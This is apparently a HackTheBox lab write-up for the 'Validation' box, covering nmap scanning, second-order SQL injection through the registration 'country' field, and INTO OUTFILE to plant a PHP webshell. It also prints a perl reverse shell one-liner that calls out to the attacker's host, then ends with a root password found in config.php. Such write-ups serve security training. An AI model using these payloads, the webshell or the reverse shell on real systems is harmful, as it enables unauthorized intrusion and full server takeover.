An easy Linux box from HackTheBox, using a second order SQLi for initial access, and then finding a password in a config file for root.



Usual nmap

nmap -sC -sV -oA nmap/validation
Starting Nmap 7.92 ( ) at 2022-05-10 13:22 EDT
Nmap scan report for
Host is up (0.016s latency).
Not shown: 992 closed tcp ports (conn-refused)
22/tcp   open     ssh           OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 46:3d:6b:cb:a8:19:eb:6a:d0:68:86:94:86:73:e1:72 (ECDSA)
|_  256 70:32:d7:e3:77:c1:4a:cf:47:2a:de:e5:08:7a:f8:7a (ED25519)
80/tcp   open     http          Apache httpd 2.4.48 ((Debian))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.48 (Debian)
5000/tcp filtered upnp
5001/tcp filtered commplex-link
5002/tcp filtered rfe
5003/tcp filtered filemaker
5004/tcp filtered avt-profile-1
8080/tcp open     http          nginx
|_http-title: 502 Bad Gateway
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Looking at the http port, see a registration page

When you submit the form, the request looks like

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
Connection: close
Cookie: user=5e11f49b0320731e0898a5a4a676ada8
Upgrade-Insecure-Requests: 1


Running sqlmap on the request doesn’t give me anything, and if I try to register with a normal ’ injection it works fine

However, when sending a request to /account.php with my registration cookie, it returns an error - demonstrating some kind of second order SQL injection

</b>:  Uncaught Error: Call to a member function fetch_assoc() on bool in /var/www/html/account.php:33
Stack trace:
#0 {main}
  thrown in <b>/var/www/html/account.php</b>


Lets try to dump the database, but first, we can find out what the user is with

username=123a&country=Brazil' union select user();-- -

Within the registration request, then when we try to go to /account.php, see that the user is

<li class='text-white'> 

Now can try to dump the database - but first need to know what it is called by injecting

username=ghfj&country=Brazil' union select database();-- -

It returns that the database is called “registration”, fair enough


' union select schema_name from information_schema.schemata;-- -

To enumerate the other databases

There are 3 other databases, but they are MySQL defaults, information_schema, performance_schema, and mysql

Now we can enumerate the columns with

' union select column_name from information_schema.columns where table_name = 'registration';-- -

And it returns that the database has 4 columns, username, userhash, country and regtime - no passwords

Here we can check what priveleges the our user has with

' union select privilege_type FROM information_schema.user_privileges where grantee = "'uhc'@'localhost'";-- -

And in the long list, can see that we have access to the FILE command, being able to write to files

With a POC can use

' union select "gg" into outfile '/var/www/html/gg.txt';-- -

And can see it when you navigate to

Now we can upload a php webshell shell, using this one, and putting it into wshell.php at webroot

<?php echo passthru($_GET['cmd']); ?>

Now have a webshell, can raise it to a full shell checking for commands with which, no python, but it does have perl

perl -e 'use Socket;$i="";$p=9001;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

With a reverse shell, find a password in the config.php file


Which is the password to root